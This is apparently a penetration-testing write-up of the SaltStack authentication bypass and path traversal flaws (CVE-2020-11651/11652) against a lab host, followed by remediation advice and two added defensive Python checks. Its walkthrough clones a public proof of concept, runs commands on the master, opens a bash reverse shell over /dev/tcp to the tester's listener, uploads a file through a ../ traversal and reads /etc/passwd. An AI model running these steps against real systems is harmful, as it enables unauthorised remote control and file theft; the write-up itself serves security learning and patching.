The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.
Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
- SaltStack Salt 2019.2.3
- SaltStack Salt 3000.1
- Cisco Modeling Labs Corporate Edition (CML)
- Cisco TelePresence IX5000 Series
- Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)
1. This vulnerability is present in versions before 3000.1. We will enumerate this service; first I noticed an API site exposed.
2. To identify the version, I ran a curl command and sent an HTTP request so I could inspect the response headers. I noticed “X-Upstream: salt-api/3000-1”.
- curl -v http://192.168.71.62:8000/
1. Knowing this API is SaltStack, we can proceed to look for exploits. I found this one, which worked really well.
2. We will download the exploit and install the required library (salt).
- git clone https://github.com/jasperla/CVE-2020-11651-poc.git
- sudo pip3 install salt
- cd CVE-2020-11651-poc
3. Now we run the exploit.py file with the help option.
- python3 exploit.py -h
4. Now we will run the program as a test. If we get the “root key”, it is working without issues.
- python3 exploit.py --master 192.168.71.62
5. Now I will run a test command: a ping, which I capture with tcpdump (this only executes on the master; to execute on all the minion servers use --exec-all).
- sudo tcpdump -i tun0
- python3 exploit.py --master 192.168.71.62 --exec "ping -c 4 192.168.49.71"
Output in packet capture
6. At this point we know that we can execute commands and that we have connectivity back to our local machine. Now I will start a listener and execute a bash reverse shell.
- nc -lvp 4505
- python3 exploit.py --master 192.168.71.62 --exec "bash -i >& /dev/tcp/192.168.49.71/4505 0>&1"
Final result (reverse shell)
- whoami && date && hostname
1. We can upload files and then read them back to verify.
- echo "Vry4n was here" > sample.txt
- python3 exploit.py --master 192.168.71.62 --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
- python3 exploit.py --master 192.168.71.62 -r "/tmp/sample.txt"
2. We can also read files using -r.
- python3 exploit.py --master 192.168.71.62 -r "/etc/passwd"
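The second advisory above describes ClearFuncs methods that "improperly sanitize paths", and the upload step shows the shape of the problem: a destination of `../../../../../../../../tmp/sample.txt` lands outside the directory the method was meant to serve. The following is an added example, not code from Salt or from the exploit repository, of the containment check that such a file-handling method should apply. The base directory `/srv/salt-demo` and the minion-relative path are constructed values for illustration.

```python
import os

# Constructed base directory that a file-handling method is meant to serve.
BASE_DIR = "/srv/salt-demo"

# Constructed inputs: one well-formed relative path, the traversal destination
# from the upload step above, and an absolute path.
SAMPLE_PATHS = [
    "minions/web01/sample.txt",
    "../../../../../../../../tmp/sample.txt",
    "/etc/passwd",
]


def resolve_under_base(base_dir, user_path):
    """Resolve user_path against base_dir and refuse any result that is not
    inside base_dir. Normalisation happens first, so '..' segments, repeated
    separators and absolute paths are all judged by where they actually end up,
    not by their spelling."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # The base itself is allowed; anything else must sit below base + separator,
    # which also rejects sibling directories that merely share the prefix
    # (e.g. /srv/salt-demo-other).
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError("path escapes base directory: %r" % user_path)
    return candidate


def classify_paths(base_dir, paths):
    """Return {path: resolved_path_or_None}; None marks a rejected path."""
    result = {}
    for p in paths:
        try:
            result[p] = resolve_under_base(base_dir, p)
        except ValueError:
            result[p] = None
    return result


if __name__ == "__main__":
    for path, resolved in classify_paths(BASE_DIR, SAMPLE_PATHS).items():
        print("%-45s -> %s" % (path, resolved or "REJECTED"))
```

Only the first constructed path resolves; the traversal string and the absolute path are both rejected because their real location is outside the base directory.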
Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SaltStack website.
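The version seen in step 2 (the `X-Upstream: salt-api/3000-1` header) and the fixed versions named in the remediation line are enough to decide, from the defender's side, whether an exposed salt-api is still on an affected release. The following is an added example, not code from Salt or from the exploit repository; it parses a raw header block as `curl -v` would show it and compares the advertised version against the fix versions stated on this page (2019.2.4 for the 2019.2 line, 3000.2 for the 3000 line). The header block below is constructed; only the X-Upstream value mirrors the one observed above.

```python
import re

# Fix versions from the advisory text: anything older on the same release line is affected.
FIXED_2019_LINE = (2019, 2, 4)
FIXED_3000_LINE = (3000, 2, 0)

# Constructed sample of the response headers from `curl -v` against salt-api.
# Only the X-Upstream value is taken from the page; the other headers are made up.
SAMPLE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "X-Upstream: salt-api/3000-1\r\n"
    "Content-Length: 146\r\n"
)

# Salt versions look like 2019.2.3, 3000.1 or, in the X-Upstream header, 3000-1.
VERSION_RE = re.compile(r"(\d{4})[.\-](\d+)(?:[.\-](\d+))?")


def parse_salt_version(text):
    """Return (major, minor, patch) from strings such as 'salt-api/3000-1' or
    'salt 2019.2.3'; a missing patch number defaults to 0. None if no
    Salt-style version is present."""
    match = VERSION_RE.search(text)
    if not match:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version):
    """True when the version is older than the fix on its release line."""
    if version[0] >= 3000:
        return version < FIXED_3000_LINE
    return version < FIXED_2019_LINE


def format_version(version):
    """Render a tuple the way Salt prints it (3000.2 vs 2019.2.4)."""
    major, minor, patch = version
    if major >= 3000:
        return "%d.%d" % (major, minor)
    return "%d.%d.%d" % (major, minor, patch)


def upstream_version_from_headers(raw_headers):
    """Extract the Salt version from an X-Upstream header, if one is present."""
    match = re.search(r"^x-upstream:\s*(.+?)\s*$", raw_headers, re.I | re.M)
    if not match:
        return None
    return parse_salt_version(match.group(1))


def assess_headers(raw_headers):
    """Decide whether the advertised salt-api version is on an affected release
    and which version it should be upgraded to."""
    version = upstream_version_from_headers(raw_headers)
    if version is None:
        return {"version": None, "vulnerable": None,
                "note": "no X-Upstream salt-api version advertised"}
    fixed = FIXED_3000_LINE if version[0] >= 3000 else FIXED_2019_LINE
    return {
        "version": version,
        "vulnerable": is_vulnerable(version),
        "upgrade_to": format_version(fixed),
    }


if __name__ == "__main__":
    print(assess_headers(SAMPLE_HEADERS))
```

The same parser accepts the output of `salt --version` (for example `salt 3000.1`), so the check can be run against a master locally after the upgrade to confirm the installed version is at or past the fix.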